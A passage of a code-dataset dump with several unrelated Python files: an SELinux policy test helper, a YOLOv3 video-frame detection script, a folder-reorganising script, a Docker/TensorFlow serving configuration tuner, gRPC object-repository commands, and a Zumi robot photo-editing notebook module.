self.__Rules.add(Rule)\n continue\n if ret == 1:\n break;\n # We should never get here.\n sys.exit(\"Failed to import policy\")\n\n def __InitTERules(self):\n init_avtab = self.__libsepolwrap.init_avtab\n init_avtab.restype = c_void_p\n avtabIterP = init_avtab(c_void_p(self.__policydbP))\n if (avtabIterP == None):\n sys.exit(\"Failed to initialize avtab\")\n self.__GetTERules(self.__policydbP, avtabIterP)\n self.__libsepolwrap.destroy_avtab(c_void_p(avtabIterP))\n init_cond_avtab = self.__libsepolwrap.init_cond_avtab\n init_cond_avtab.restype = c_void_p\n avtabIterP = init_cond_avtab(c_void_p(self.__policydbP))\n if (avtabIterP == None):\n sys.exit(\"Failed to initialize conditional avtab\")\n self.__GetTERules(self.__policydbP, avtabIterP)\n self.__libsepolwrap.destroy_avtab(c_void_p(avtabIterP))\n\n # load ctypes-ified libsepol wrapper\n def __InitLibsepolwrap(self, LibPath):\n if \"linux\" in sys.platform:\n self.__libsepolwrap = CDLL(LibPath + \"/libsepolwrap.so\")\n elif \"darwin\" in sys.platform:\n self.__libsepolwrap = CDLL(LibPath + \"/libsepolwrap.dylib\")\n else:\n sys.exit(\"only Linux and Mac currrently supported\")\n\n # load file_contexts\n def __InitFC(self, FcPaths):\n fc = []\n for path in FcPaths:\n if not os.path.exists(path):\n sys.exit(\"file_contexts file \" + path + \" does not exist.\")\n fd = open(path, \"r\")\n fc += fd.readlines()\n fd.close()\n self.__FcDict = {}\n for i in fc:\n rec = i.split()\n try:\n t = rec[-1].split(\":\")[2]\n if t in self.__FcDict:\n self.__FcDict[t].append(rec[0])\n else:\n self.__FcDict[t] = [rec[0]]\n except:\n pass\n\n # load policy\n def __InitPolicy(self, PolicyPath):\n load_policy = self.__libsepolwrap.load_policy\n load_policy.restype = c_void_p\n self.__policydbP = load_policy(create_string_buffer(PolicyPath))\n if (self.__policydbP is None):\n sys.exit(\"Failed to load policy\")\n\n def __init__(self, PolicyPath, FcPaths, LibPath):\n self.__InitLibsepolwrap(LibPath)\n self.__InitFC(FcPaths)\n self.__InitPolicy(PolicyPath)\n\n def __del__(self):\n if self.__policydbP is not None:\n 
self.__libsepolwrap.destroy_policy(c_void_p(self.__policydbP))\n","sub_path":"tests/policy.py","file_name":"policy.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"638029864","text":"\"\"\"\nExample (runs YOLO on a frame every 20 seconds for 5 min vids):\n python plugins/PyTorch-YOLOv3/video_extract.py \n --frames_folder data/inputs/videos_512x288/frames_1fps \n --output_folder data/inputs/videos_512x288/yolo80_3fpm\n --max_num_frames 15\n --frame_skip 20 \n\"\"\"\n\nfrom __future__ import division\n\nfrom models import *\nfrom utils.utils import *\nfrom utils.datasets import *\n\nimport os\nimport sys\nimport time\nimport datetime\nimport argparse\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torch.autograd import Variable\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom matplotlib.ticker import NullLocator\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--frames_folder', type=str, help='path to dataset of frames')\nparser.add_argument('--output_folder', type=str, help='where to store raw, supp0.8 and supp0.5')\n\nparser.add_argument('--max_num_frames', type=int, default=sys.maxsize, help='max num frames to use in output')\nparser.add_argument('--frame_skip', type=int, default=1, help='max num frames to use for output')\nparser.add_argument('--frame_offset', type=int, default=0, help='starting frame to use for output')\n\nparser.add_argument('--config_path', type=str, default='plugins/PyTorch-YOLOv3/config/yolov3.cfg', help='path to model config')\nparser.add_argument('--weights_path', type=str, default='weights/yolov3.weights', help='path to weights file')\nparser.add_argument('--nms_thres', type=float, default=0.4, help='iou thresshold for non-maximum suppression')\nparser.add_argument('--batch_size', type=int, default=1, help='size of the batches')\nparser.add_argument('--n_cpu', type=int, default=1, help='number of cpu threads to use during batch generation')\nparser.add_argument('--img_size', type=int, default=512, help='size of each image dimension')\nparser.add_argument('--use_cuda', type=bool, default=True, help='whether to use cuda if available')\nopt = parser.parse_args()\nprint(opt)\n\ncuda = torch.cuda.is_available() and opt.use_cuda\n\nif opt.batch_size != 1:\n raise Exception(\"Not supported.\")\n\n# Set up model\nmodel = Darknet(opt.config_path, img_size=opt.img_size)\nmodel.load_weights(opt.weights_path)\n\nif cuda:\n model.cuda()\n\nmodel.eval() # Set in evaluation mode\n\ndataloader = DataLoader(VideoFrameImageFolder(\n opt.frames_folder, \n img_size=opt.img_size, \n max_num_frames=opt.max_num_frames,\n frame_skip=opt.frame_skip,\n frame_offset=opt.frame_offset,\n ), \n batch_size=1, shuffle=False, num_workers=opt.n_cpu)\n\nTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\n\nprint (f'\\nPerforming object detection and saving to files in {opt.output_folder}:')\nprev_time = time.time()\nfor batch_i, (video_id, _, batch_of_input_imgs) in enumerate(dataloader):\n # Already batched by data loader (so torch batch size is 1, but there is a batch here).\n input_imgs = torch.squeeze(batch_of_input_imgs, dim=0)\n video_id = video_id[0]\n\n # Configure input\n input_imgs = Variable(input_imgs.type(Tensor)) \n\n # Get detections\n with torch.no_grad():\n detections_raw = model(input_imgs)\n detections_point5 = non_max_suppression(detections_raw, 80, 0.5, opt.nms_thres, 
fixed_num_preds=16)\n detections_point8 = non_max_suppression(detections_raw, 80, 0.8, opt.nms_thres, fixed_num_preds=8)\n detections = detections_point8\n\n print (f\"Saving the video id {video_id}\")\n # torch.save(detections_raw, os.path.join(f\"{opt.output_folder}/raw\", f'{video_id}.pt'))\n torch.save(torch.stack(detections_point5), os.path.join(f\"{opt.output_folder}/supp0.5\", f'{video_id}.pth'))\n torch.save(torch.stack(detections_point8), os.path.join(f\"{opt.output_folder}/supp0.8\", f'{video_id}.pth'))\n\n # Log progress\n current_time = time.time()\n inference_time = datetime.timedelta(seconds=current_time - prev_time)\n prev_time = current_time\n print (f'\\t+ Batch {batch_i}, Video ID {video_id} Inference Time: {inference_time}')\n\n\n","sub_path":"video_extract.py","file_name":"video_extract.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"444081983","text":"import os\r\nimport shutil\r\n\r\nfor foldernames in os.listdir(path= r'\\\\10.56.141.46\\d$\\NET1\\АРХИВ_СКАН'):\r\n #print(foldernames+'\\n')\r\n print(foldernames+'\\n')\r\n file_handler = open(\"D:\\\\с диска S\\log.txt\", \"a\")\r\n file_handler.write(foldernames+'\\n')\r\n #тут надо производить запись либо в конце\r\n a = foldernames[:5]\r\n b = foldernames[6:13]\r\n #с = a + b + foldernames[14:]\r\n #формируем путь\r\n if a != foldernames[:5]:\r\n a = foldernames[:5]\r\n if b != foldernames[6:13]:\r\n b = foldernames[6:13]\r\n path1 = r'\\\\10.56.141.46\\d$\\NET1\\АРХИВ_СКАН'+'\\\\'+ foldernames\r\n path = r'\\\\10.56.141.46\\d$\\NET1\\АРХИВ_СКАН'+'\\\\'+ a +'\\\\'+ a+'_'+b+'\\\\'+foldernames\r\n #shutil.copytree(str(path1), str(path))\r\n shutil.move(str(path1), str(path)) \r\n #print(foldernames[:5]+'-a '+foldernames[7:13]+'-b '+foldernames[14:]+'\\n')\r\n #shutil.copytree('D:\\\\с диска S\\jobi', 'D:\\\\с диска S\\jobnew\\'+'str(a)')\r\n file_handler.close() \r\n \r\n","sub_path":"arh.py","file_name":"arh.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"519502143","text":"from __future__ import print_function\n\nimport numpy as np\nfrom recordtype import recordtype\nimport yaml\nimport utils\nimport subprocess\nimport random\nimport re\nimport time\n\ncompose_params = recordtype('compose_params', 'replicas max_cpu max_memory')\nbatching_params = recordtype('batching_params', 'max_batch_size batch_timeout_micros')\n\n\nclass Configuration:\n\n def __init__(self, batching_file=None, compose_file=None, gpu_freq=None):\n self.batching_file = batching_file\n self.compose_file = compose_file\n self.allowed_gpu_freq = np.array([1306, 1293, 1280, 1267, 1254, 1241, 1228, 1215, 1202, 1189, 1176, 1163, 1150, 1137, 1124, 1110, 1097,\n 1084, 1071, 1058, 1045, 1032, 1019, 1006, 993, 980, 967, 954, 941, 928, 915, 901, 888, 875, 862, 849,\n 836, 823, 810, 797, 784, 771, 758, 745, 732, 719, 705, 692, 679, 666, 653, 640, 627, 614, 601, 588, 575,\n 562, 549, 405, 392, 379, 366, 353, 340, 327, 324, 314, 301, 288, 275, 270, 267, 265, 263, 261, 259, 257,\n 255, 253, 251, 249, 247, 245, 243, 241, 239, 237, 235, 233, 231, 229, 226, 224, 222, 220, 218, 216, 214,\n 212, 210, 208, 206, 204, 202, 200, 198, 196, 194, 192, 190, 188, 186,\n 183, 181, 179, 177, 175, 173, 171, 169, 167, 165, 163, 161, 159, 157, 155, 153, 151, 149, 147, 145, 143, 140, 138, 136])\n self.allowed_batch_size = np.array([4, 8, 16, 32, 64, 96, 128])\n 
self.min_batch_timeout = 100\n        self.max_batch_timeout = 100000\n        self.max_replicas = 20\n        self.compose_params = compose_params(None, None, None)\n        self.batching_params = batching_params(None, None)\n        self.load_compose_params()\n        self.load_batching_params()\n        self.set_gpu_freq(gpu_freq)\n\n    def set_batching_file(self, batching_file):\n        self.batching_file = batching_file\n\n    def set_compose_file(self, compose_file):\n        self.compose_file = compose_file\n\n    def load_compose_params(self):\n        with open(self.compose_file, 'r') as stream:\n            try:\n                yaml_params = yaml.safe_load(stream)\n                replicas = yaml_params['services']['tf']['deploy']['replicas']\n                max_cpu = yaml_params['services']['tf']['deploy']['resources']['limits']['cpus']\n                max_memory = yaml_params['services']['tf']['deploy']['resources']['limits']['memory']\n                self.compose_params.replicas = replicas\n                self.compose_params.max_cpu = str(max_cpu)\n                self.compose_params.max_memory = re.sub(\"[^0-9]\", \"\", max_memory)\n\n            except yaml.YAMLError as exc:\n                print(exc)\n\n    def load_batching_params(self):\n        with open(self.batching_file, 'r') as files:\n            lines = files.readlines()\n            max_batch_size = lines[0].split(':')[1].split('}')[0]\n            batch_timeout_micros = lines[1].split(':')[1].split('}')[0]\n            self.batching_params.max_batch_size = int(max_batch_size)\n            self.batching_params.batch_timeout_micros = int(batch_timeout_micros)\n\n    def write_batching_params(self, max_batch_size, batch_timeout_micros):\n        max_batch_size = utils.find_nearest_config(self.allowed_batch_size, max_batch_size)\n\n        if batch_timeout_micros < self.min_batch_timeout:\n            batch_timeout_micros = self.min_batch_timeout\n        elif batch_timeout_micros > self.max_batch_timeout:\n            batch_timeout_micros = self.max_batch_timeout\n\n        self.batching_params.max_batch_size = int(max_batch_size)\n        self.batching_params.batch_timeout_micros = int(batch_timeout_micros)\n        self.dump_batching_params()\n\n    def dump_batching_params(self):\n        with open(self.batching_file, 'w+') as file:\n            file.write('max_batch_size { value: %d }\\n' % self.batching_params.max_batch_size)\n            file.write('batch_timeout_micros { value: %d }\\n' % self.batching_params.batch_timeout_micros)\n            file.write('pad_variable_length_inputs: true\\n')\n            file.write('num_batch_threads {value: 8}')\n\n    def write_compose_params(self, replicas, max_cpu, max_mem):\n        if replicas < 1:\n            replicas = 1\n        elif replicas > self.max_replicas:\n            replicas = self.max_replicas\n\n        if max_cpu < 0.2:\n            max_cpu = 0.2\n        elif max_cpu > 0.5:\n            max_cpu = 0.5\n\n        if max_mem < 500:\n            max_mem = 500\n        elif max_mem > 10000:\n            max_mem = 10000\n\n        self.compose_params.max_cpu = str(round(max_cpu, 2))\n        self.compose_params.max_memory = str(int(max_mem/100)*100)\n        self.compose_params.replicas = int(replicas)\n        self.dump_compose_params()\n\n    def dump_compose_params(self):\n        with open(self.compose_file, 'r') as stream:\n            try:\n                yaml_params = yaml.safe_load(stream)\n            except yaml.YAMLError as exc:\n                print(exc)\n\n\n        yaml_params['services']['tf']['deploy']['replicas'] = self.compose_params.replicas\n        yaml_params['services']['tf']['deploy']['resources']['limits']['cpus'] = self.compose_params.max_cpu\n        yaml_params['services']['tf']['deploy']['resources']['limits']['memory'] = self.compose_params.max_memory+'M'\n\n\n        with open(self.compose_file, 'w') as outfile:\n            yaml.dump(yaml_params, outfile, default_flow_style=False)\n\n    def set_gpu_freq(self, gpu_freq):\n        self.gpu_freq = utils.find_nearest_config(self.allowed_gpu_freq, gpu_freq)\n\n    def write_config(self, max_batch_size, batch_timeout_micros, 
replicas, max_cpu, max_memory, gpu_freq):\n        self.write_compose_params(replicas, max_cpu, max_memory)\n        self.write_batching_params(max_batch_size, batch_timeout_micros)\n        self.set_gpu_freq(gpu_freq)\n\n    def reload(self):\n        status = self.run_gpu_with_freq()\n        if status != 0:\n            print(\"Error Setting GPU Freq\")\n            return\n\n        #Killing Previous App\n        status = subprocess.call(['docker', 'stack', 'rm', 'opennmtapp'])\n        if status!=0:\n            print(\"Error Killing Previous Service\")\n            return\n\n        time.sleep(30)\n\n        #Opening New Docker Service\n        process = subprocess.call(['docker', 'stack', 'deploy', '-c', self.compose_file, 'opennmtapp'])\n        if process != 0:\n            print(\"Cannot Start New Docker Service\")\n            return\n\n    def run_gpu_with_freq(self):\n        output = subprocess.call(['nvidia-smi', '--application-clocks=900,'+str(self.gpu_freq)])\n        return output\n\n    def get_config_as_array(self):\n        self.load_batching_params()\n        self.load_compose_params()\n        return np.array([self.batching_params.max_batch_size, self.batching_params.batch_timeout_micros, self.compose_params.replicas, self.compose_params.max_cpu\n                            , self.compose_params.max_memory, self.gpu_freq])\n\n    def create_random_config(self):\n        max_batch_size = random.randint(1, 130)\n        batch_timeout_micros = random.randint(100, 100000)\n        replicas = random.randint(1, 20)\n        max_cpu = random.random()\n        max_memory = random.randint(500, 10000)\n        gpu_freq = random.randint(100, 1400)\n\n        # print(max_batch_size)\n        return np.array([max_batch_size, batch_timeout_micros, replicas, max_cpu, max_memory, gpu_freq])\n\n    def set_config_as_array(self, arr):\n        self.write_config(arr[0], arr[1], arr[2], arr[3], arr[4], arr[5])\n\n    def print_configuration(self):\n        self.load_batching_params()\n        self.load_compose_params()\n        print(\"Max Batch Size: %d\" % self.batching_params.max_batch_size)\n        print(\"Batch Timeout Micros: %d\" % self.batching_params.batch_timeout_micros)\n        print(\"Replicas: %d\" % self.compose_params.replicas)\n        print(\"Max CPU: %s\" % self.compose_params.max_cpu)\n        print(\"Max Memory: %s\" % self.compose_params.max_memory)\n        print(\"GPU Freq: %d\" % self.gpu_freq)\n\n\nclass SystemState:\n    def __init__(self, batch_size=None, inference_time=None, concurrency=None):\n        # Default Configs\n        batching_file = 'batching_parameters.txt'\n        compose_file = 'docker-compose.yml'\n        gpu_freq = 1306\n        self.config = Configuration(batching_file, compose_file, gpu_freq)\n        self.batch_size = batch_size\n        self.inference_time = inference_time\n        self.concurrency = concurrency\n\n    def change_state(self, gpu_freq, max_batch_size, batch_timeout_micros, replicas, max_cpu, max_memory,\n                     batch_size=None, inference_time=None, concurrency=None):\n        self.config.write_config(max_batch_size, batch_timeout_micros, replicas, max_cpu, max_memory, gpu_freq)\n        self.batch_size = batch_size\n        self.inference_time = inference_time\n        self.concurrency = concurrency\n\n    def set_batch_size(self,batch_size):\n        self.batch_size = batch_size\n\n    def set_concurrency(self, con):\n        self.concurrency = con\n\n    def set_inference_time(self, time):\n        self.inference_time = time\n\n    def set_configuration(self, max_batch_size, batch_timeout_micros, replicas, max_cpu, max_memory, gpu_freq):\n        self.config.write_config(max_batch_size, batch_timeout_micros, replicas, max_cpu, max_memory, gpu_freq)\n        self.config.reload()\n\n    def set_random_config(self):\n        config_array = self.config.create_random_config()\n        print(\"**************Setting Configuration:****************** \")\n        # print(config_array)\n        
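# Apply the generated configuration files, then restart the Docker stack so the\n        # new settings take effect.\n        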
self.config.set_config_as_array(config_array)\n self.config.print_configuration()\n self.config.reload()\n\n def get_config_array(self):\n return self.config.get_config_as_array()\n\n def get_system_array(self):\n self.config.load_batching_params()\n self.config.load_compose_params()\n return np.array([self.config.batching_params.max_batch_size, self.config.batching_params.batch_timeout_micros, self.config.compose_params.replicas,\n self.config.compose_params.max_cpu, self.config.compose_params.max_memory, self.config.gpu_freq, self.batch_size, self.inference_time,\n self.concurrency])\n\n\nif __name__ == '__main__':\n\n # config = Configuration('batching_parameters.txt', 'docker-compose.yml', 1306)\n # config.write_batching_params(100, 10)\n # config.write_compose_params(5, 0.6, 100)\n # config.set_gpu_freq(1200)\n # config.print_configuration()\n # config.reload()max_batch_size, batch_timeout_micros, replicas, max_cpu, max_memory, gpu_freq\n # Killing Previous App\n\n state = SystemState()\n state.set_random_config()\n print(state.get_config_array())\n # state.config.print_configuration()\n\n\n\n\n","sub_path":"configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":10860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"388004308","text":"import os\nimport shutil\nimport tempfile\nfrom os import path\nfrom typing import IO, Generator, List\nfrom zipfile import ZipFile\n\nfrom xdcs.app import xdcs\nfrom xdcs.cmd import Command\nfrom xdcs_api.common_pb2 import Chunk\nfrom xdcs_api.object_repository_pb2 import ObjectIds, DependencyResolutionRequest, ObjectKey, ObjectType\nfrom xdcs_api.object_repository_pb2_grpc import ObjectRepositoryStub\n\n\nclass FetchDeploymentCmd(Command):\n _deployment_id: str\n\n def __init__(self, deployment_id: str):\n self._deployment_id = deployment_id\n\n def execute(self):\n stub = ObjectRepositoryStub(xdcs().channel())\n req = DependencyResolutionRequest()\n deployment_key = ObjectKey()\n deployment_key.objectId = self._deployment_id\n deployment_key.objectType = ObjectType.DEPLOYMENT\n req.objectKeys.extend([deployment_key])\n req.depth = 2 ** 32 - 1\n object_ids = stub.ResolveDependencies(req).objectIds\n object_ids.append(self._deployment_id)\n\n xdcs().execute(RetrieveObjectsCmd((ids for ids in [object_ids])))\n\n\nclass RetrieveObjectsCmd(Command):\n _object_ids: Generator[List[str], None, None]\n\n def __init__(self, object_ids: Generator[List[str], None, None]):\n self._object_ids = object_ids\n\n def execute(self):\n stub = ObjectRepositoryStub(xdcs().channel())\n chunks = stub.RequestObjects(self.__generate_requests())\n\n tmp_dir = tempfile.mkdtemp()\n try:\n zip_path = tmp_dir + '/zip'\n # download the zip file\n with open(zip_path, 'wb') as zipfile:\n self.__write_chunks(zipfile, chunks)\n\n # extract objects\n with ZipFile(zip_path) as zipfile:\n zipfile.extractall(tmp_dir)\n objects = zipfile.namelist()\n\n # remove the zip file\n os.remove(zip_path)\n\n obj_repo = xdcs().object_repository()\n for obj in objects:\n obj_repo.import_object(tmp_dir + '/' + obj, required_id=obj)\n finally:\n shutil.rmtree(tmp_dir)\n\n def __write_chunks(self, zipfile: IO, chunks):\n for chunk in chunks:\n chunk: Chunk\n zipfile.write(chunk.content)\n\n def __generate_requests(self):\n for ids in self._object_ids:\n requested_objects = ObjectIds()\n requested_objects.objectIds.extend(ids)\n yield requested_objects\n\n\nclass DumpObjectRepositoryTreeCmd(Command):\n _root_id: str\n 
_out_path: str\n\n    def __init__(self, root_id: str, out_path: str):\n        self._root_id = root_id\n        self._out_path = out_path\n\n    def execute(self):\n        self._dump_tree(self._root_id, self._out_path)\n\n    def _dump_tree(self, root_id, out_path):\n        entries = xdcs().object_repository().cat_json(root_id)\n        for entry in entries:\n            file_path = path.join(out_path, entry['name'])\n            mode = entry['mode']\n            object_id = entry['id']\n\n            object_type = mode[:2]\n            permissions = int(mode[2:], 8)\n\n            if object_type == '12':\n                content = xdcs().object_repository().cat_bytes(object_id)\n                os.symlink(content, file_path)\n                os.chmod(file_path, permissions)\n            elif object_type == '10':\n                content = xdcs().object_repository().cat_bytes(object_id)\n                with open(file_path, 'wb+') as fh:\n                    fh.write(content)\n                os.chmod(file_path, permissions)\n            elif object_type == '04':\n                os.mkdir(file_path, permissions)\n                self._dump_tree(object_id, file_path)\n","sub_path":"xdcs-agent/src/main/python/xdcs/cmd/object_repository.py","file_name":"object_repository.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"336351328","text":"from picamera.array import PiRGBArray\nfrom picamera import PiCamera\nimport IPython.display\n\n#from ipywidgets import interact, Layout, Image, Select, Button, IntSlider, RadioButtons\nfrom ipywidgets import interact, Layout\nimport ipywidgets as widgets \nimport cv2\nimport numpy as np\nfrom PIL import Image\nimport time\n\nfile_name = ''\n\n# initialize the camera and grab a reference to the raw camera capture\ncamera = PiCamera()\n \n\ndef take_photo():\n    global file_name\n    print('- Taking a photo.')\n\n    file_name = input('- Photo name? ')\n\n    print('Supported photo sizes')\n    print('- 640 x 480, 320 x 240, 160 x 128')\n    \n    while True: \n        width = int(input('- Photo width? '))\n        if(width <= 640):\n            break\n    \n    while True: \n        height= int(input('- Photo height? '))\n        if(height <= 480):\n            break\n\n    print('The photo size you entered is %d x %d.'%(width, height))\n\n    camera.resolution = (width, height)\n    camera.framerate = 20\n    rawCapture = PiRGBArray(camera, size=(width, height))\n\n    print(\"- Three !\")\n    time.sleep(0.5)\n    print(\"- Two !\")\n    time.sleep(0.5)\n    print(\"- One !\")\n    time.sleep(0.5)\n    print(\"- Taking the photo !\")\n    \n    camera.capture(rawCapture, format=\"rgb\")\n\n    frame = rawCapture.array\n    frame = cv2.flip(frame, 0)\n    frame = cv2.flip(frame, 1)\n    rawCapture.truncate(0)\n\n    savePhoto = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n    cv2.imwrite('photo/'+file_name + \".png\" ,savePhoto) \n    \n    print(\"- Photo saved\")\n\n    IPython.display.display(Image.fromarray(frame))\n    IPython.display.clear_output(wait=True) \n\n\ndef rgb_channel():\n    global file_name \n    imageLocation = 'photo/zumi.png'\n    \n    if(file_name !=''):\n        imageLocation = 'photo/'+file_name + \".png\" \n\n    wImgC = widgets.Image(layout = Layout(border=\"solid\"),\n                          width=300, height=400 # image size\n                         )\n\n    wSelect = widgets.Select(\n        options=['RGB','R', 'G', 'B'],\n        value='RGB',\n        description='Channel:',\n    )\n\n    def on_RGB_clicked(b): \n        RGBChannelSelect(b['new'])\n\n    def RGBChannelSelect(channel):\n\n        image = cv2.imread(imageLocation) # read the image\n        b, g, r = cv2.split(image)\n\n        if(channel =='RGB'):\n            image = cv2.imencode(\".png\", image)[1].tostring() \n        elif(channel =='R'): \n            image = cv2.imencode(\".png\", r)[1].tostring() \n        elif(channel =='G'):\n            image = cv2.imencode(\".png\", g)[1].tostring() \n        elif(channel =='B'):\n            image = cv2.imencode(\".png\", b)[1].tostring() \n\n        wImgC.value = image \n\n\n\n    RGBChannelSelect('RGB')\n\n\n    wSelect.observe(on_RGB_clicked, names = 'value')\n\n    BOX_NEW = widgets.Box([wImgC, wSelect])\n    display(BOX_NEW)\n    \n\ndef mosaic():\n    global file_name \n    imageLocation = 'photo/zumi.png'\n    \n    if(file_name !=''):\n        imageLocation = 'photo/'+file_name + \".png\" \n    \n    #mosic_ratio = 0.05\n    \n    mosic_ratio = 0.2\n\n    wImgM = widgets.Image(layout = Layout(border=\"solid\"),\n                          width=300, height=400 # image size\n                         )\n\n    wbuttonM = widgets.Button(description='Make mosaic', \n                              layout= Layout(\n                                  width='160px', height='40px',\n                                  border='1px solid black')\n                             )\n\n    def on_mosaic_clicked(b): \n        mosaic_change()\n\n    def mosaic_change(): \n\n        image = cv2.imread(imageLocation)\n\n        # mosic_ratio = mosaic ratio\n        \n        small = cv2.resize(image, None, fx=mosic_ratio, fy=mosic_ratio, interpolation=cv2.INTER_NEAREST) \n        image = cv2.resize(small, image.shape[:2][::-1], interpolation=cv2.INTER_NEAREST)\n\n        image = cv2.imencode(\".png\", image)[1].tostring() \n        wImgM.value = image \n\n\n    image = cv2.imread(imageLocation) # read the image\n    originalImg = cv2.imencode(\".png\", image)[1].tostring() \n    wImgM.value = originalImg \n\n    wbuttonM.on_click(on_mosaic_clicked)\n\n    BOX_NEW = widgets.VBox([wImgM, wbuttonM])\n    display(BOX_NEW)\n    \ndef transform():\n    global file_name \n    imageLocation = 'photo/zumi.png'\n    \n    if(file_name !=''):\n        imageLocation = 'photo/'+file_name + \".png\" \n    \n    #RotaionRatio = 0.5 # use 1 if the image gets clipped when rotating\n\n    RotaionRatio = 1 # use 1 if the image gets clipped when rotating\n\n\n    wImagR = widgets.Image(layout = Layout(border=\"solid\"),\n                           width=300, height=400 # image size\n                          )\n\n    wRadioR = widgets.RadioButtons(\n        options=['Original','Rotate 90 left', 'Rotate 90 right', 'Flip horizontal','Flip vertical'],\n        description='Rotate:',\n        disabled=False\n    )\n\n\n    def on_Rotate_change(change): \n        ImageRotate(change['new'])\n\n    def ImageRotate(direction):\n\n        image = cv2.imread(imageLocation) # read the image\n\n        (height, width) = image.shape[:2]\n        (center_height,center_width) = (height/2.0, width/2.0)\n\n        if(direction == 'Rotate 90 left'): \n            angle = 90 \n            M = cv2.getRotationMatrix2D((center_width, center_height), angle, RotaionRatio) \n            image = cv2.warpAffine(image, M, (width, height))\n\n        elif(direction == 'Rotate 90 right') : \n            angle = -90 \n            M = cv2.getRotationMatrix2D((center_width, center_height), angle, RotaionRatio) \n            image = cv2.warpAffine(image, M, (width, height))\n\n        elif(direction == 'Flip horizontal') : \n            image = cv2.flip(image, 1) \n\n        elif(direction == 'Flip vertical') : \n            image = cv2.flip(image, 0) \n\n        originalImg = cv2.imencode(\".png\", image)[1].tostring() \n        wImagR.value = originalImg \n\n\n\n    ImageRotate('Original')\n\n    wRadioR.observe(on_Rotate_change, names='value')\n\n    BOX_NEW = widgets.Box([wImagR, wRadioR])\n    display(BOX_NEW)\n    \ndef grayscale():\n    \n    global file_name \n    imageLocation = 'photo/zumi.png'\n    \n    if(file_name !=''):\n        imageLocation = 'photo/'+file_name + \".png\" \n\n    wImgB = widgets.Image(layout = Layout(border=\"solid\"),\n                          width=300, height=400 # image size\n                         )\n\n    wSlideB = widgets.IntSlider(\n        value=0, min=-100, max=100, step=1,\n        description='variable:',\n        continuous_update=False,\n        orientation='vertical',\n    )    \n\n    def on_Bright_change(change): \n        changeGrayScale(change['new'])\n\n    def changeGrayScale(bright): \n        image = cv2.imread(imageLocation, cv2.IMREAD_GRAYSCALE) \n        image = image + bright \n        blackImg = cv2.imencode(\".png\", image)[1].tostring() \n        wImgB.value = blackImg \n\n\n    changeGrayScale(0)\n\n    wSlideB.observe(on_Bright_change, names='value')\n\n    BOX_NEW = widgets.Box([wImgB, wSlideB])\n    display(BOX_NEW)\n    \n    \ndef btn_borderline():\n    \n    global file_name \n    imageLocation = 'photo/zumi.png'\n    \n    if(file_name !=''):\n        imageLocation = 'photo/'+file_name + \".png\" \n    \n    wImg1E = widgets.Image(layout = Layout(border=\"solid\"), \n                           width=300, height=400 # image size\n                          )\n    wImg2E = widgets.Image(layout = Layout(border=\"solid\"), \n                           width=300, height=400 # image size\n                          )\n\n    wbuttonE = widgets.Button(description='Detect edges', \n                              layout= Layout(\n                                  width='160px', height='40px',\n                                  border='1px solid black')\n                             )\n\n    def on_edge_clicked(b):\n        contour()\n\n    def contour():\n\n        image = cv2.imread(imageLocation) # read the image\n\n        gray_img = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY) # convert to grayscale\n        canny_img = cv2.Canny(gray_img, 0, 10)# Canny edge algorithm\n\n        canny_img = cv2.imencode(\".png\", canny_img)[1].tostring() \n        wImg2E.value = canny_img \n\n\n    image = cv2.imread(imageLocation) # read the image\n    originalImg = cv2.imencode(\".png\", image)[1].tostring() \n    wImg1E.value = originalImg \n    wImg2E.value = originalImg \n\n    wbuttonE.on_click(on_edge_clicked)\n\n    BOX_NEW = widgets.VBox([wImg1E, wImg2E, wbuttonE])\n    display(BOX_NEW)\n\n    \ndef slide_borderline():\n    global file_name \n    imageLocation = 'photo/zumi.png'\n    \n    if(file_name !=''):\n        imageLocation = 'photo/'+file_name + \".png\" \n    \n    wImg1E = widgets.Image(layout = Layout(border=\"solid\"), \n                           width=300, height=400 # image size\n                          )\n\n    wImg2E = widgets.Image(layout = Layout(border=\"solid\"), \n                           width=300, height=400 # image size\n                          )\n\n    wSlidE = widgets.IntSlider(\n        value=10, min=0, max=1500, step=10,\n        description='variable:',\n        continuous_update=False,\n        orientation='vertical',\n    )    \n\n\n    def on_edge_change(change): \n        contour(change['new'])\n\n    def contour(range):\n\n        image = cv2.imread(imageLocation) # read the image\n\n        gray_img = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY) # convert to grayscale\n        originalImg = cv2.imencode(\".png\", image)[1].tostring() \n        wImg1E.value = originalImg \n\n        canny_img = cv2.Canny(gray_img, 0, range)# Canny edge algorithm\n        canny_img = cv2.imencode(\".png\", canny_img)[1].tostring() \n        wImg2E.value = canny_img \n\n\n    contour(10)\n\n    wSlidE.observe(on_edge_change, names='value')\n\n    BOX_NEW = widgets.Box([wImg1E, wImg2E, wSlidE])\n    display(BOX_NEW)\n    \n    \n    \n    ","sub_path":"Lesson/module/PhotoApp.py","file_name":"PhotoApp.py","file_ext":"py","file_size_in_byte":9944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
